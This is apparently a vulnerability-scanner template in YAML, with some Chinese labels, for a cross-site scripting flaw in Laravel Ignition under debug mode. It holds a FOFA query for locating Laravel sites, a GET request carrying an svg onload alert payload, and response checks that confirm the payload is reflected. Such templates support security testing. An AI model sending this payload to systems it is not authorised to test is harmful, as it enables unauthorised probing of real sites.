product: Laravel
vName: Laravel Ignition - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 3
vDesc: Laravel Ignition contains a cross-site scripting vulnerability when debug mode is enabled.
version: ''
note: ''
search:
  FOFA: app="Laravel-Framework"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /_ignition/scripts/--><svg%20onload=alert(document.domain)>
    verify:
      logic: and
      check:
        - body:
            value:
              - 'Undefined index: --><svg onload=alert(document.domain)> in file'
            logic: and
          header:
            value:
              - text/html
            logic: and
          status: 500